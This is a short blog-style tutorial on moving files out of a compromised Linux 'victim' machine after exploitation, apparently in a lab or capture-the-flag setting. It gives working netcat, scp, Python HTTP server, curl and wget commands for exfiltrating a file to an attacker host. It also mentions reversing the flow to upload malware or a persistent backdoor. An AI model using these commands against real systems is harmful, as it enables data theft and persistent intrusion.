Post Exploitation: Transferring Files Between Linux Hosts
After taking over a PC by exploiting a vulnerability you might wander how to transfer files remotely from victim to your host machine.
In this article I'll be guiding you through some common methodologies I have used to transfer files between host and the victim’s machine.
Note: These methods are for Linux operating systems.
Netcat
An easy and my favorite one
Netcat is usually known as ‘swiss knife’ of a hacker.
As Netcat is installed on most of the Linux operating systems by default we can use it as an advantage for this.
Let’s say if the victim machine has a file called user.txt and we want that file to our host/attacking machine.
How we should do is;
Open a listener in host machine and append a filename.
Change the file extension according the file on victim’s machine.
If the victim’s machine has a ‘.rar’ file then change the extension to ‘.rar’.
nc -lvnp 4444 > user.txt
Now from the victim’s machine send thefile via netcat.
nc 10.8.6.184 4444 -w 3 < user.txt
what we did above is send the user.txt on the victim machine’s current directory via Netcat to the target/host machine.
SCP
To do this you should have three things;
- victim’s username,
- password,
- and the SSH port should be opened.
let’s say if the victim’s machine username is mitch, SSH port is 2222, has a file named user.txt in path /home/mitch/ and needs to save the file in host machine’s path ‘/home/frosky/’.
From the host machine type the following command.
scp -P 2222 mitch@10.10.45.168:/home/mitch/user.txt /home/frosky/
Python server
You can start a simple http server and send files from the current directory you are in.
From the victim’s machine type the following command.
python -m SimpleHTTPServer 8080Note: In here you use a different port rather than using the default http port 80, in that case you should allow the mentioning port via firewall if any firewalls present on the victim’s machine.
If you want to start an HTTP server on port 8080, you should allow port 8080 via firewall using;
ufw allow 8080
Note: To add a firewall rule you need to be in root in victim’s machine.
After starting the server doing above steps, run command ‘curl’ as below;
curl -o user.txt http://10.10.37.169:8080/user.txt
Alternatively you can run ‘wget’ command if ‘wget’ is installed in victim’s machine.
wget http://10.10.37.169:8080/user.txt
This also works the other way around!
Say if you want to upload a Malware file or a persistent backdoor to the victim’s machine, just do the above steps the other way around.
Simply, swap the victim machine’s commands with the host machine commands.
if you know more methods to share files between hosts don’t hesitate to comment.
if you like this article please leave me a clap or two, and don’t forget to follow me as well.
find me on YouTube;
